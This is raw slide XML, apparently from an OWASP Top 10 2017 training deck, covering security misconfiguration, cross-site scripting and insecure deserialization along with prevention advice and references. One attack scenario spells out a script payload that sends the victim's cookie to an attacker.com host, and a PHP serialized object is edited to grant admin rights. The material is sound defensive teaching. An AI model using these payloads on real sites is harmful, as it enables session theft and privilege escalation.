                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) or are they not set to secure values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="90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Is any of your software out of date? (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Without a concerted, repeatable application security configuration process, systems are at a higher risk.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId5"/>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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For additional requirements in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ASVS requirements areas for Security Configuration (V11 and V19)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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9"/>
              </a:rPr>
              <a:t>NIST Guide to General Server Hardening</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0"/>
              </a:rPr>
              <a:t>CWE Entry 2 on Environmental Security Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Is your application missing the proper security hardening across any part of the application stack? Including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1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171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1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Remove or do not install any unnecessary features, components, documentation and samples. Remove unused dependencies and frameworks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1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A process to triage and deploy all updates and patches in a timely manner to each deployed environment. This process needs to include all frameworks, dependencies, components, and libraries (see **A9:2017 Using Components with Known Vulnerabilities**).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1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A strong application architecture that provides effective, secure separation between components, with segmentation, containerization, or cloud security groups (ACLs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An automated process to verify the effectiveness of the configurations and settings in all environments.</a:t>
            </a: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186173882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2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:cs typeface="Arial"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200" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers will often attempt to access default accounts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, frameworks, and custom code. Automated scanners are useful for detecting  misconfigurations, use of default accounts or configurations, unnecessary services, legacy options etc.</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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise. 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Scenario 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT'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value=</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("CC")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&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</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http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  foo=</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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Note that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XSS?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Reflected XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Your application or API includes unvalidated and  unescaped user input as part of HTML output or there is no content security policy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, malicious advertisements, or similar.</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Stored XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Your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DOM XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JavaScript frameworks, single page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typical XSS attacks include session stealing, account takeover, MFA bypass, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM node replacement or defacement (such as trojan login panels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>),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2"/>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#3 Encode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#4 Validate Data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Application Security Verification Standard - V5</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Testing for Reflected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OWASP Testing Guide: Testing for Stored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Testing Guide: Testing for DOM XSS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DOM based XSS Prevention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XSS Filter Evasion Cheat Sheet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Java Encoder Project</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CWE-79 Improper neutralization of user supplied input</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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>: Client-side template injection</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preventing XSS requires separation of untrusted data from active browser content.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Use safer frameworks that automatically escape for XSS by design, such as in Ruby 3.0 or React JS, or leverage framework XSS protections</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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> has details on the required data escaping techniques.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enabling a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path traversal overwrites, or vulnerable libraries in permitted sources, such as content delivery network or local libraries. </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14165254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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability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1">
                        <a:solidFill>
                          <a:schemeClr val="bg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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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bg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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="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100" b="0" kern="1200" baseline="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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker changes the serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object to give themselves admin privileges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
